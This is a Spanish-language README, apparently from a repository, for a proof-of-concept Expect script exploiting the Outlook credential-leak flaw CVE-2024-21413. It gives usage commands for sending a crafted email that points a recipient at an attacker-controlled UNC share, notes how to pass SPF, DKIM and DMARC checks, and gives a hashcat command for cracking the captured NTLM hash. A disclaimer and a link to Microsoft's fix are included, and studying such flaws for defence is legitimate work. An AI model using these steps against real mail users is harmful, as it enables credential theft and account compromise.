
Vulnerabilidad de divulgación de información de Microsoft Outlook (fuga de hash de contraseña) - Expect Script POC
Vulnerabilidad de fuga de credenciales y ejecución remota de código en Microsoft Outlook cuando se combina con CVE-2023-21716 (a través del panel de vista previa) CVSS:3.1 9.8 / 8.5
Outlook debería advertirle sobre el riesgo de abrir un enlace externo => pero no es el caso!

usage: ./cve-2024-21413.sh mx.fqdn port sender recipient url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"
notas: chmod +x cve-2024-21413.sh
requiere la aplicación expect & requiere una IP de envío y un correo electrónico legítimos (para pasar SPF, DKIM, DMARC)



entonces debería obtener el inicio de sesión y el hash de la persona que hizo clic en el enlace (sin el aviso de advertencia en la versión afectada de Outlook)

Luego puede intentar descifrar la contraseña con hashcat. Simplemente copie toda la línea con el nombre de inicio de sesión a un archivo y ejecute hashcat con el módulo 5600
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
Solución alternativa / Corrección: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
más sobre mí ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Aviso: IMPORTANTE: Este script se proporciona SOLO para fines educativos, pruebas éticas y uso legal. No lo use en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas y redes informáticas es ilegal, y los usuarios que realicen actividades no autorizadas estarán sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script.